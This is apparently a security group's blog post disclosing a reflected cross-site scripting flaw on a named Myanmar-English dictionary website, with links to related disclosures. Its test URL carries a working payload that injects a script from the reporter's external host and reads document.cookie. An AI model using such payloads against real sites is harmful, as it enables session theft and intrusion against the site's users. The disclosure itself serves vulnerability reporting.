PlanetCreator has reported another critical XSS Vulnerability on Ayar Myanmar – English Dictionary Website :    Owned by Ayar Myanmar Unicode Group.

Test XSS : 

http://myanmardictionary.co.cc/feedback.php?page=1&q=%27%22%3E%3C%2Ftitle%3E%3Cscript%20src=http://www.planetcreator.net/attacking/xss/planetcreator-xss.js%3Ealert%28document.cookie%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+PlanetCreator%3C%2Fh1%3E%3C%2Fmarquee%3E

This vulnerability has been alerted to :- webmaster

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy.

We hope that your security staff will look into this issue and fix it as soon as possible.

Explore More

Critical SQL Injection in Myanmar Calendar

PlanetCreator‘s Security Team Researcher Infofreakzzz reported another Critical SQL injection (vulnerability) on Myanmar Calendar URL : http://www.myanmarcalendar.org/ SQL injection is a code injection technique that exploits a security vulnerability occurring

Read More

Misconfigured security features or Incorrect use of security

Session cookie is not randomized enoughNumerous applications use a session cookie to maintain the state of a logged in user. The use of authentication to validate the user that has

Read More

Huge internet bill? Are you a zombie? How does your computer act as zombie?

Zombie or zombie computers are becoming the number one source of all malware and spam attacks. A zombie is a computer attached to the Internet that has been compromised by

Read More